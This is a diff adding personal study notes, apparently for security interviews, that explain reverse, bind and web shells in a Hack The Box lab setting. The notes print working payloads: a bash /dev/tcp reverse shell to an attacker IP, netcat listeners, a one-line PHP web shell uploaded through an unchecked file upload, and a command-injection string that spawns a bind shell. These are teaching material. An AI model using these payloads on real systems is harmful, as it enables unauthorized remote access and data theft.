anjiarige/Unknown-to-known/Interview.md

 ---

+# Reverse shell
+Firewalls typically block incoming connections but allow outgoing connections.
+Think about it — a server needs to make outgoing requests all the time (DNS queries, updates, API calls).
+So outgoing traffic is rarely blocked.
+A reverse shell exploits this by making the target initiate the connection outward to you.
+Example:
+On your Kali machine (attacker)
+- You set up a listener: `nc -lvnp 4444`
+- Your Kali is now listening on port 4444, waiting for someone to connect.
+On the target machine (victim)
+- You somehow execute this command on the target: `bash -i >& /dev/tcp/10.10.14.8/4444 0>&1` Breaking this down: bash -i starts an interactive bash shell. >& /dev/tcp/10.10.14.8/4444 redirects all output (stdout and stderr) to a TCP connection to your Kali on port 4444.
+0>&1 redirects input (stdin) through the same connection.
+So all input and output of the shell goes through the network to your machine.

+# WEB SHELL — A shell that lives inside a website
+A web shell is completely different from bind and reverse shells.
+It's a `malicious script` (usually PHP, ASP, or JSP) that you upload to a web server.
+You then interact with it through your browser or `curl`.
+There's no direct TCP connection like the other two — everything goes over HTTP.
+**Create a simple web shell**
+- A basic PHP web shell is just one line: `<?php system($_GET['cmd']); ?>`
+- Save this as `shell.php`.
+**Upload it to the target**
+- You need to find a way to get this file onto the web server.
+Common methods include exploiting a `file upload vulnerability` (like a profile picture upload that doesn't check file types), using LFI or other vulnerabilities to write files, or through FTP/SSH if you have credentials.
+Let's say the target has an image upload feature at http://target.com/upload.
+You upload shell.php instead of an image.
+The server saves it to /var/www/html/uploads/shell.php.
+**Use the web shell**
+- Now you just visit it in your browser: `http://target.com/uploads/shell.php?cmd=whoami`
+- The server executes whoami and displays the result on the web page: `www-data`: `http://target.com/uploads/shell.php?cmd=cat /etc/passwd`
+- Shows you the passwd file.
+Every command you type in the cmd parameter gets executed on the server.

+# Bind shell
+- You're hacking an HTB machine.
+The target IP is 10.10.10.50.
+Your Kali IP is 10.10.14.8.
+You found a website running on the target with a search box that is vulnerable to command injection.
+- The search box normally does this internally: `grep "your_input" /var/www/data/products.txt`
+- You type this in the search box on the website: `; nc -lvnp 4444 -e /bin/bash`
+- What just happened?
+The target machine ran netcat, opened port 4444, and is now waiting for someone to connect.
+Think of it like the target just turned on a phone and is waiting for your call.
+- On your Kali terminal you type: `nc 10.10.10.50 4444` You're calling that phone.
+The target picks up and gives you a bash shell.
+`Why reverse shell wins: In the bind shell, your Kali has to reach port 4444 on the target.
+If there's a firewall on the target, it blocks you.
+In the reverse shell, the target reaches out to your Kali.
+Firewalls rarely block outgoing traffic, so it works almost every time.`

+>[!Important]
+> Bind shell = Target says "come to me" | Reverse shell = Target says "I'll come to you"

 `Think of it this way: XXE abuses a parser, SSRF abuses a fetcher, Path Traversal abuses a file reader, LFI abuses a file executor (locally), and RFI abuses a file executor (remotely).`